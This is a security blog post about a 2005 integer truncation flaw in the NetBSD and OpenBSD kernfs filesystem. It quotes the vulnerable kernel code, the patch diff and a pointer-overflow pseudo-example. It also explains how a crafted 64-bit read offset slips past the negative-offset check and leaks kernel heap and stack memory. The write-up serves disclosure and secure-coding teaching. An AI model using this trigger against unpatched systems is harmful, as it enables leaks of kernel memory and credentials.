Time is an Illusion
[Editor's Note: This is part one of a two part post, the second of which is Vineetha Paruchuri's guest co-post, which can be found: here]
It makes sense to me that physicists have been arguing against time as a physical construct for years now, because as humans we have a clear penchant for ignoring time altogether. More precisely, we seem to ignore history as if it never happened. And, when we do recall historical events, we somehow do so erroneously. This isn't just true in the world of politics or law, it's true in every facet of society. Tech, and sometimes especially tech, is no outlier.
It makes sense to me that physicists have been arguing against time as a physical construct for years now, because as humans we have a clear penchant for ignoring time altogether. More precisely, we seem to ignore history as if it never happened. And, when we do recall historical events, we somehow do so erroneously. This isn't just true in the world of politics or law, it's true in every facet of society. Tech, and sometimes especially tech, is no outlier.
In 2005, I was bored, making silly bets with friends on IRC about how fast we could find exploitable bugs in "secure" operating systems. This was pretty common for us, as young hackers spend the majority of their time reading source code. A good friend pointed out that the increased scrutiny on the BSD variants was decreasing the number of exploitable integer overflow attacks on kernels. I argued that this was probably false, and that there were lots of bugs yet to be found.
What's interesting is that this bug class is still prevalent today. In fact, it may be the most underreported bug class in the history of computing. In 2014, when I released the LZO and LZ4 memory corruption bugs, they are of the exact same class of exploitable integer issues. Because of pointer arithmetic, and how CPUs manage the indexing of memory, they are extremely difficult to find and remediate. The difficulty of this bug class caused the LZO vulnerability to persist in the wild for over 20 years, and allowed variants of LZO, such as LZ4, to be created with the exact same vulnerability.
Finding the Bug
Back to my friends and I on IRC, we made a bet: Find an exploitable kernel vulnerability affecting any BSD variant within an hour. The winner gets bragging rights. I almost lost, having found the bug in literally 57 minutes and some seconds.
The bug? An integer truncation flaw in the NetBSD and OpenBSD kernfs pseudo-filesystem. This file system provides access to kernel abstractions that the user can read to identify the state of the running kernel. In Linux terms, these abstractions would all be handled by procfs. On BSD, procfs was (is?) a pseudo-filesystem providing insight into only active processes, themselves. On Linux, procfs provides access to kernel objects ranging from the CPU, to VMM, processes, and even network abstractions.
The flaw was discovered by trolling through NetBSD patches. In fact, I discovered the bug by identifying a patch for a similar integer problem committed days earlier, simply by chance. Because I constantly monitored the patches for all BSDs, it was easy to troll through the patches identifying ones may be valuable. An interesting commit tag caught my eye:
Revision 1.112 / (download) - annotate - [select for diffs], Thu Sep 1 06:25:26 2005 UTC (10 years, 10 months ago) by christos
Branch: MAIN
CVS Tags: yamt-vop-base3, yamt-vop-base2, yamt-vop-base, thorpej-vnode-attr-base, thorpej-vnode-attr
Branch point for: yamt-vop
Changes since 1.111: +6 -6 lines
Diff to previous 1.111 (colored)
Branch: MAIN
CVS Tags: yamt-vop-base3, yamt-vop-base2, yamt-vop-base, thorpej-vnode-attr-base, thorpej-vnode-attr
Branch point for: yamt-vop
Changes since 1.111: +6 -6 lines
Diff to previous 1.111 (colored)
Also protect the ipsec ioctls from negative offsets to prevent panics
in m_copydata(). Pointed out by Karl Janmar. Move the negative offset
check from kernfs_xread() to kernfs_read().
As depicted above, the patch applied at revision 1.112 purports to resolve multiple integer related bugs from being triggered in the kernfs_xread function. It does so by moving the check for all valid read offsets to kernfs_read. One might think, at this point, that this is a solved problem. Presumably all bugs in the former function can be resolved by placing the check in the latter, parent function.
However, there is an easy to spot problem in the patch. Consider the following code:
int kernfs_read(v) void *v; { struct vop_read_args /* { struct vnode *a_vp; struct uio *a_uio; int a_ioflag; struct ucred *a_cred; } */ *ap = v; struct uio *uio = ap->a_uio; struct kernfs_node *kfs = VTOKERN(ap->a_vp); char strbuf[KSTRING], *bf; off_t off; size_t len; int error; if (ap->a_vp->v_type == VDIR) return (EOPNOTSUPP); /* Don't allow negative offsets */ if (uio->uio_offset < 0) return EINVAL; off = uio->uio_offset; bf = strbuf; if ((error = kernfs_xread(kfs, off, &bf, sizeof(strbuf), &len)) == 0) error = uiomove(bf, len, uio); return (error); }
Initially, this looks appropriate. The function now checks to see if the file descriptor associated with a kernfs file has a negative read offset. If a negative offset is identified, the function returns with an error. Otherwise, the offset is passed to kernfs_xread and presumed safe for all operations within that function.
This should be fine, except for the function kernfs_xread, itself. Here is the definition of the function:
static int kernfs_xread(kfs, off, bufp, len, wrlen) struct kernfs_node *kfs; int off; char **bufp; size_t len; size_t *wrlen; {
In BSD variants, the off_t type is always a signed 64bit integer to accommodate for large files on modern file systems, regardless of whether the underlying architecture is 32bit or 64bit. The problem arises when the 64bit signed integer is checked for its sign bit, then passed to the kernfs_xread function. Passing the off_t to the function truncates the value to a 32bit signed integer. This means that the check for a negative 64bit integer is invalid. An adversary only need to set bit 31 of the 64bit offset to ensure that the value passed to kernfs_xread is negative.
The result of this integer truncation bug can be observed at the end of kernfs_xread. At the end of this function, we have the following code, regardless of which type of kernfs pseudo-file is being read:
len = strlen(*bufp); if (len <= off) *wrlen = 0; else { *bufp += off; *wrlen = len - off; } return (0); }
This code ensures that the size of the data copied back to userland is very large, and that the pointer to the data being copied will point outside the valid memory buffer for the given file. What's really great about this bug is that both kernel stack and kernel heap can be referenced, depending on which kernfs file is being read while triggering the bug.
This allows an attacker to page through heap memory, which may contain the contents of privileged files, binaries, or even security tokens such as SSH private keys. Paging through stack memory is less immediately valuable, but allows an attacker to disclose other tokens (such as kernel stack addresses) that may be relevant to subsequent attacks.
Patching the Bug
Though this vulnerability affected both NetBSD and OpenBSD, OpenBSD claimed that "it isn't a vulnerability" because they previously removed the kernfs filesystem from the default OpenBSD kernel. However, it was still build-able in the OpenBSD tree at the time, meaning that it was indeed a vulnerability in their source tree. It just wasn't a vulnerability by default. This was yet another misstep in a long standing career of misdirection by the core OpenBSD team. The NetBSD team reacted quickly, as kernfs was not only still integrated into the default kernel, it was mounted by default, allowing any unprivileged user access to abuse this bug.
I sold this vulnerability to Ejovi Nuwere's security consulting firm, who ethically acquired software flaws in order to help promote their consulting practice. Tim Newsham reviewed the flaw and agreed that it was an interesting finding. Ejovi's team managed the relationship during patching and helped develop the resolution with the NetBSD team, who was quick to patch the bug. I was impressed with Ejovi's professionalism, and also appreciated the NetBSD team's fast work, and the fact that they didn't whine about the bug in the way OpenBSD did.
The patch fixed the bug by performing the check on the truncated integer rather than the signed 64bit offset.
@@ -922,18 +922,18 @@ kernfs_read(v) struct uio *uio = ap->a_uio; struct kernfs_node *kfs = VTOKERN(ap->a_vp); char strbuf[KSTRING], *bf; - off_t off; + int off; size_t len; int error; if (ap->a_vp->v_type == VDIR) return (EOPNOTSUPP); + off = (int)uio->uio_offset; /* Don't allow negative offsets */ - if (uio->uio_offset < 0) + if (off < 0) return EINVAL; - off = uio->uio_offset; bf = strbuf; if ((error = kernfs_xread(kfs, off, &bf, sizeof(strbuf), &len)) == 0) error = uiomove(bf, len, uio);
Breaking the Historical Cycle
While we considered the patch adequate at the time, we were wrong. The reason for this is based on the logic from the first This Old Vulnerability blog post: an integer doesn't need to be negative to create a negative offset or an over/underflow when applied to an arbitrary pointer in kernel memory. This is because the value of any given pointer does not start at address zero. This is a presumption often made in systems engineering.
Tests presume a base address of zero, rather than the pointer's actual address, plus the offset into the pointer. If a 32bit pointer address points to 0xb0000000UL, an integer overflow will occur with an offset far less than would be required to set a sign bit. If this pointer address and a sufficient offset value are used in an inadequate expression, it may seem that the test would pass. Consider the following pseudo-example:
uint32_t * p = 0xb0000000UL;
uint32_t off = 0x60000000UL;
uint32_t * max_p = 0xb0008000UL;
if(off < 0 || p + off >= max_p)
return EINVAL;
Some compilers will actually compile out the above code as it would be impossible to properly evaluate. But, if engineers don't notice this, or if there is no warning message printed by the compiler, or if an IDE is being used that doesn't adequately highlight the warning messages, this can result in critical flaws in software.
Testing this properly requires policy that evaluates both the base of the pointer and a ceiling for the pointer given the context of its usage. If a pointer points to a structure of a particular size, any expression that results in an address must be verified to land within that structure. This can be done by performing the operation, storing the result in the appropriate type, then evaluating the address as being within the structure in memory.
As noted in the previous blog post, this requires organizational coding standards that enforce policies on how pointers expressions are evaluated and how they are tested. It also requires an evaluation of the context of each pointer.
As always, these improvements are challenging to implement because they aren't simply a coding construct. This is an organizational problem that must be addressed at the management level along with each individual engineer's coding practices. Peer reviews must be accentuated with policies that guide auditing practices, and guarantee a higher level of success in catching and fixing these issues. For help, consider hiring Lab Mouse Security to assist with your internal code audits, and break the seemingly eternal cycle of exploitable integer vulnerabilities!
An Introduction
For those that don't know her, Vineetha Paruchuri is a brilliant up-and-coming information security researcher. She and I have been discussing the effects of security flaws that have persisted over decades, why langsec addresses some of the remediation/mitigation potential, but what gaps are still missing.
This resulted in a guest post where Vineetha evaluates modern active models for the reduction of security flaws, rather than retrospective models which include code reviews, bug reports, etc. I highly suggest reading her guest blog as a co-piece to this one, and a primer for anyone interested in the modern movement to active, rather than passive, vulnerability reduction models.
Don A. Bailey
Founder and CEO